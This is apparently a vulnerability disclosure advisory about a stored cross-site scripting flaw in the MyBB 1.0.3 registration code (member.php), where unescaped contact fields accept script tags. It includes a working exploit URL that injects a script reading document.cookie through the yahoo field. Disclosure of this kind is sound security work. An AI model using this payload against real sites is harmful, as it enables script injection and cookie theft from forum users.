MyBB 1.0.3

member.php~XSS Attack in contact details

-------

[KAPDA::#36] - MyBB 1.0.3~member.php~XSS Attack in contact details

KAPDA New advisory

MyBB 1.0.3~member.php~XSS Attack in contact details


-------------------Summary----------------
Software: MyBB
Sowtware?s Web Site: http://www.mybboard.com
Versions: 1.0.3
Class: Remote
Status: Unpatched
Exploit: Available
Discovered by: <strong>imei addmimistrator</strong>
Risk Level: <strong>medium</strong>

-----------------Description---------------
There is a security bug in MyBB 1.0.3 software (latest version fully patched) that allows attacker performe an <strong>XSS </strong>attack.<!--more--> bug is in result of leaving some unneeded codes or some codes that have not any field for entry but are available for blindfolded input...
Bug is in member.php file while registering.Some fields that never htmlspecialchar in showing profile process (because they htmlspecialchared while CHANGING{and not while registering}) entered in user detail fields and can accept &lt;&gt;&amp; chars...
exploitable field<strong>S</strong> are : 
aim ~ yahoo ~ msn ~ website 
source of buggy code are in member.php {382-417}
$newuser = array(
....view source for more detailes...

--------------Exploit----------------------
/mybb/member.php?username=blab&password=blabblab &password2=blabblab &email=blab@blab.com& &email2=blab@blab.com&imagestring=[fill here if needed]&imagehash=[fill here if needed]
&action=do_register&<strong>yahoo=%3C script%3E alert(document.cookie)%3C/script %3E</strong>&regsubmit=register me mybb:D

--------------Solution---------------------
Not Available


Credit :
--------------------
Discovered by imei addmimistrator
imei(4}kapda(O}ir
addmimistrator(4}gmail(O}com
www.myimei.com
Computer Security Science Researchers Institute
[http://www.KAPDA.ir] 


-------